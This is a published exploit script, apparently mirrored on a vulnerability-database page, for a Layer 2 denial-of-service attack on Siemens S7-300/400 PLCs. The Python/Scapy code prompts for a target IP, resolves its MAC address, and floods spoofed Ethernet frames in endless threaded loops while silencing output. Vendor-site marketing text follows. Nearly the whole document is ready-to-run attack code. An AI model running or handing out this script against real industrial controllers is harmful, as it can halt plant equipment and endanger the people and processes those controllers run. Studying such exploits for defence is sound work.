# Exploit Title: Siemens S7 Layer 2 - Denial of Service (DoS)
# Date: 21/10/2021
# Exploit Author: RoseSecurity
# Vendor Homepage: https://www.siemens.com/us/en.html
# Version: Firmware versions >= 3
# Tested on: Siemens S7-300, S7-400 PLCs
#!/usr/bin/python3
from scapy.all import *
from colorama import Fore, Back, Style
from subprocess import Popen, PIPE
from art import *
import threading
import subprocess
import time
import os
import sys
import re
# Banner
print(Fore.RED + r"""
βββΒ· ββ’ βββββββ β’ β β Β·. βββΒ· βββββ βββ
ββ ββ ββͺββββ’ββ βͺ Β·ββ βββββͺββ ββ β’ββ βͺ ββ βΒ·
βββββ βββββ ββ.βͺ ββββ ββ βββββΒ·βββββ ββ.βͺ ββββ ββββ
ββ βͺβββββββ βββΒ·βββ.ββββ ββββββββ βͺββ βββΒ·βββ.βββββ’ββ
β β βββ βββ βββββͺββ ββͺβββ β β βββ βββββͺ.β β
ββββββββ .βββ β’ β β Β·. βͺ β β βββΒ· βββββ βββ
β’ββ ββ.βΒ·ββ βΒ·Β·ββ βββββͺββ β’ββββββ ββ β’ββ βͺ ββ βΒ·
ββ.βͺββββͺβββββ ββ βββββΒ·ββΒ·ββββββββββ ββ.βͺ ββββ ββββ
βββΒ·ββββββββ’ββββ ββββββββββββββββ βͺββ βββΒ·βββ.βββββ’ββ
βββ βββ .β βββ ββͺββββββββ ββͺ β β βββ βββββͺ.β β
""")
time.sleep(1.5)
# Get IP to exploit
IP = input("Enter the IP address of the device to exploit: ")
# Find the mac address of the device
Mac = getmacbyip(IP)
# Function to send the ouput to "nothing"
def NULL ():
f = open(os.devnull, 'w')
sys.stdout = f
# Eternal loop to produce DoS condition
def Arnold ():
AutomatorTerminator = True
while AutomatorTerminator == True:
Packet = Ether()
Packet.dst = "00:00:00:00:00:00"
Packet.src = Mac
sendp(Packet)
NULL()
def Sarah ():
AutomatorTerminator = True
while AutomatorTerminator == True:
Packet = Ether()
Packet.dst = "00:00:00:00:00:00"
Packet.src = Mac
sendp(Packet)
NULL()
def Kyle ():
AutomatorTerminator = True
while AutomatorTerminator == True:
Packet = Ether()
Packet.dst = "00:00:00:00:00:00"
Packet.src = Mac
sendp(Packet)
NULL()
# Arnold
ArnoldThread = threading.Thread(target=Arnold)
ArnoldThread.start()
ArnoldThread.join()
NULL()
# Sarah
SarahThread = threading.Thread(target=Sarah)
SarahThread.start()
SarahThread.join()
NULL()
# Kyle
KyleThread = threading.Thread(target=Kyle)
KyleThread.start()
KyleThread.join()
NULL()Data
Build on a solid foundation withΒ Vulners data
WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data
Api
Power your application withΒ Vulners API
The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access
App
Assess and manage vulnerabilities withΒ VulnersΒ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation